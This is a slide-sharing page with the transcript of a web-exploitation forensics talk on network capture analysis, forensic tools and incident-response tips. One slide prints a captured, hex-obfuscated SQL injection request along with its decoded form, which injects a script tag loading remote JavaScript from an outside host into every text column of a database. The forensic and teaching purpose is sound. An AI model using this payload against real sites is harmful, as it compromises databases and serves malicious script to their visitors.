Forensic Investigations of Web Exploitations

Slides:



Advertisements
Similar presentations
© 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Installation & management of SUSE.
Advertisements

Intrusion Detection/Prevention Systems Charles Poff Bearing Point.
Slide 1 FastFacts Feature Presentation June 14, 2011 We are using audio during this session, so please dial in to our conference line… Phone number:
Business Transaction Management Software for Application Coordination 1 Business Processes and Coordination.
Wireless Monitoring and Protection. Topics Objectives Protocol Analyzers WIPS Common WIDS/WIPS Features Conclusion.
1 Secure Online Presence Savio Fernandes
Jeopardy Q 1 Q 6 Q 11 Q 16 Q 21 Q 2 Q 7 Q 12 Q 17 Q 22 Q 3 Q 8 Q 13
Jeopardy Q 1 Q 6 Q 11 Q 16 Q 21 Q 2 Q 7 Q 12 Q 17 Q 22 Q 3 Q 8 Q 13
1 Linux IP Masquerading Brian Vargyas XNet Information Systems.
DIVIDING INTEGERS 1. IF THE SIGNS ARE THE SAME THE ANSWER IS POSITIVE 2. IF THE SIGNS ARE DIFFERENT THE ANSWER IS NEGATIVE.
Addition Facts
How Does the Internet Work? A Basic Introduction to the Worlds Biggest Computer Network.
ZMQS ZMQS
Communicating over the Network
Google as a Hacking Tool James Lee Advanced Searching.
Overview Environment for Internet database connectivity
INTERNET PROTOCOLS Class 9 CSCI 6433 David C. Roberts Entire contents copyright 2011, David C. Roberts, all rights reserved.
BT Wholesale October Creating your own telephone network WHOLESALE CALLS LINE ASSOCIATED.
ACT User Meeting June Your entitlements window Entitlements, roles and v1 security overview Problems with v1 security Tasks, jobs and v2 security.
Copyright © Open Text Corporation. All rights reserved. Slide 1 Automatic Routing With Captaris FaxPress and FaxPress Premier Darin McGinnes Sales Engineer.
Technical Track Securing EtherNet/IP Networks Presented by: Paul Didier - Cisco Eddie Lee - Moxa.
Yunling Wang VoIP Security COMS 4995 Nov 24, 2008 XCAP The Extensible Markup Language (XML) Configuration Access Protocol (XCAP)
Chapter 15 Integrated Services Digital Network ISDN Services History Subscriber Access Layers BISDN WCB/McGraw-Hill The McGraw-Hill Companies, Inc., 1998.
© 2005 AT&T, All Rights Reserved. 11 July 2005 AT&T Enhanced VPN Services Performance Reporting and Web Tools Presenter : Sam Levine x111.
powerful network monitoring & management solution
OFFICE OF SUPERINTENDENT OF PUBLIC INSTRUCTION Division of Assessment and Student Information Online MSP Testing Technology & Assessment Coordinator Training.
© Blue Coat Systems, Inc All Rights Reserved. APTs Are Not a New Type of Malware 1 Source: BC Labs Report: Advanced Persistent Threats.
Getting Familiar with Web Pages 1 2 The Internet Worldwide collection of interconnected computer networks that enables businesses, organizations, governments,
Chapter 5 Test Review Sections 5-1 through 5-4.
GG Consulting, LLC I-SUITE. Source: TEA SHARS Frequently asked questions 2.
Page 1 / 18 Internet Traffic Monitor IM Page 2 / 18 Outline Product Overview Product Features Product Application Web UI.
Addition 1’s to 20.
25 seconds left…...
Week 1.
1 © 2004, Cisco Systems, Inc. All rights reserved. CCNA 1 v3.1 Module 11 TCP/IP Transport and Application Layers.
We will resume in: 25 Minutes.
Connecting LANs, Backbone Networks, and Virtual LANs
1 Unit 1 Kinematics Chapter 1 Day
VPN AND REMOTE ACCESS Mohammad S. Hasan 1 VPN and Remote Access.
McGraw-Hill©The McGraw-Hill Companies, Inc., 2001 Chapter 16 Integrated Services Digital Network (ISDN)
1 © 2004, Cisco Systems, Inc. All rights reserved. CCNA 1 v3.1 Module 1 Introduction to Networking.
F3 Collecting Network Based Evidence (NBE)
Guide to Computer Forensics and Investigations1 Network Forensics Overview Network forensics –Systematic tracking of incoming and outgoing traffic To ascertain.
Network Intrusion Detection Systems Slides by: MM Clements A Adekunle The University of Greenwich.
1 Enabling Secure Internet Access with ISA Server.
1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls.
1 Intrusion Detection Systems. 2 Intrusion Detection Intrusion is any use or attempted use of a system that exceeds authentication limits Intrusions are.
Forensic and Investigative Accounting
Lab #2 CT1406 By Asma AlOsaimi. "Security has been a major concern in today’s computer networks. There has been various exploits of attacks against companies,
Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.
COEN 252 Computer Forensics
What is FORENSICS? Why do we need Network Forensics?
COEN 252 Computer Forensics Collecting Network-based Evidence.
Forensic and Investigative Accounting Chapter 14 Internet Forensics Analysis: Profiling the Cybercriminal © 2005, CCH INCORPORATED 4025 W. Peterson Ave.
Chapter 1: The Internet and the WWW CIS 275—Web Application Development for Business I.
Securing the Network Infrastructure. Firewalls Typically used to filter packets Designed to prevent malicious packets from entering the network or its.
1 HoneyNets. 2 Introduction Definition of a Honeynet Concept of Data Capture and Data Control Generation I vs. Generation II Honeynets Description of.
Security fundamentals Topic 10 Securing the network perimeter.
COMP2322 Lab 1 Introduction to Wireshark Weichao Li Jan. 22, 2016.
Role Of Network IDS in Network Perimeter Defense.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
KAPLAN SCHOOL OF INFORMATION SYSTEMS AND TECHNOLOGY Intrusion Detection and Incidence Response Course Name – IT Intrusion Detection and Incidence.
Internet Vulnerabilities & Criminal Activity Internet Forensics 12.1 April 26, 2010 Internet Forensics 12.1 April 26, 2010.
CompTIA Security+ Study Guide (SY0-401)
Critical Security Controls
Securing the Network Perimeter with ISA 2004
Firewall – Survey Purpose of a Firewall Characteristic of a firewall
CompTIA Security+ Study Guide (SY0-401)
Security+ Guide to Network Security Fundamentals, Third Edition
Presentation transcript:

Forensic Investigations of Web Exploitations Ondrej Krehel, CISSP, CEH, Lifars LLC

What do I do - Digital Firefighters New cyber jobs What do I do - Digital Firefighters

Case from cyber field Scenario: Web server in the DMZ zone Inbound is filtered, however outbound is not Server is running un-patched version of IIS Incident occurred ?!? - need to confirm it and if yes, incident response and investigation Recorded traffic file is available – pcap format, however we don’t have any logs, neither from firewall or web server We want to what happened and if we can find traces of commands as well as malware Wireshark analysis will be presented

Incident by Breach – All time DatalossDB.org Incident by Breach – All time

Web attacks

The first published study Cost The first published study 2011 Second Annual Cost of Cyber Crime Study by the Ponemon Institute An average web-based attack costs $143, 209; malicious code, $124,083; and malicious insiders, $100,300 Web-borne attacks, malicious code and insiders are the most costly, making up more than 90% of all cybercrime costs per organization per year

GET /home/site_content_3.asp HTTP GET – RFC 2616 GET /home/site_content_3.asp s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C0061007200650 0200040006D00200076006100720063006800610072002800380030003000300029003B007300650 07400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D0 02B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0 07300650074005B0027002B0062002E006E0061006D0065002B0027005D003D00720074007200690 06D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0 062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740 020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650 074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0 027002000660072006F006D002000640062006F002E007300790073006F0062006A0065006300740 07300200061002C00640062006F002E0073007900730063006F006C0075006D006E0073002000620 02C00640062006F002E0073007900730074007900700065007300200063002000770068006500720 06500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740 07900700065003D0027005500270061006E006400200062002E00780074007900700065003D00630 02E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760 061007200630068006100720027003B00730065007400200040006D003D005200450056004500520 053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720 069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250 027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D00520 0450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B0 0%20AS%20NVARCHAR(4000));EXEC(@S);--

CAST obfuscated data, after decoding: HTTP GET Decoded CAST obfuscated data, after decoding: declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=r trim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),800 0);set @m=REVERSE(@m);exec(@m);

BeEF exploitation of the victim

Open Source Review ( http://www.net.ohio-state.edu/software/ ) Tcpdump ( http://www.tcpdump.org/ ) Ethereal ( http://www.ethereal.com/ ) Tcpextract ( http://tcpxtract.sourceforge.net/ ) Vomit ( http://vomit.xtdnet.nl/ ) Voipong ( http://www.enderunix.org/voipong/ ) Chaosreader ( http://chaosreader.sourceforge.net/) NetworkMiner (http://networkminer.sourceforge.net/ ) UCSniff (http://ucsniff.sourceforge.net/ ) Xplico (http://www.xplico.org/ )

Open Source Tcpick ( http://tcpick.sourceforge.net/ ) Tcptrace ( http://www.tcptrace.org/ ) Tcpflow ( http://www.circlemud.org/~jelson/software/ ) Tcpreplay ( http://tcpreplay.sourceforge.net/ ) Ssldump ( http://freshmeat.net/projects/ssldump/ ) AIM Sniff (http://sourceforge.net/projects/aimsniff ) Ettercap ( http://ettercap.sourceforge.net/ ) Wireshark (http://www.wireshark.org/ ) TCPDstat (https://github.com/netik/tcpdstat ) Kismet (http://www.kismetwireless.net/ )

Open Source DataEcho (http://sourceforge.net/projects/data-echo/ ) EtherPeg (http://www.etherpeg.org/ ) Drifnet ( http://freshmeat.net/projects/driftnet/ ) Good Article on How to do it in open source: http://www.forensicfocus.com/open-source-network- forensics-appliance-howto

How to Record SPAN port (Switched Port Analyzer) or mirror port Can be part of SPAN local or remote VLAN Physical tape - TX and RX packets Don't use external DNS resolution Secure Access: use ssh and ssl, segment network

Network Forensics Commercial Network Forensic Tools Netwitness Investigator, Niksun NetVCR, WildPackets OmniPeak, Access Data SilentRunner, Guidance Software Encase Enterprise Own build - open- source tools, custom signatures Review, Tcpdump, Ethereal, Tcpextract, Vomit, Voipong, Chaosreader, Tcpick, Tcptrace, Tcpflow, Tcpreplay, Ssldump, AIM Sniff, Ettercap, Xplico, UCSniff, NetworkMiner Often integrated in IDS, IPS, HoneyPots Snort, Kfsensor, Honeyd, Specter Losses documentation – NIC, kernel, switch Examiner action logging

Protocol IPv4

OSI Model

Xplicco

Xplico

Chaosreader

Chaosreader

Tips for Businesses Incident Response Plan Establish relationships with vendors before incident Consider subscribing to Cyber Response or Data Breach program Review current layers of protection, and network topology Incident Response Plan Can you recognize the incident? Is evidence properly preserved? Are formalized Incident Response policies in place and tested on annual basis? Is internal staff properly trained?

Contacts Ondrej Krehel, CISSP, CEH, Information Security Officer Lifars, LLC Email: krehel@lifars.com

Abbreviations C & C – Command and Control Channels VOIP – Voice over Internet Protocol SQL – Structured Query Language MFT- Master File Table DNS – Domain Name System P2P – Peer-to-peer networks UPX – Ultimate Packer for eXecutables CAST – Encoding and SQL function MRU – Most Recently Used section in Windows registry IDS/IPS – Intrusion Detection/Prevention Systems LKM – Loadable Kernel Module IM – Instant Messaging TCP/UPD – Common transfer protocols

Abbreviations Hexadecimal Encoding

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.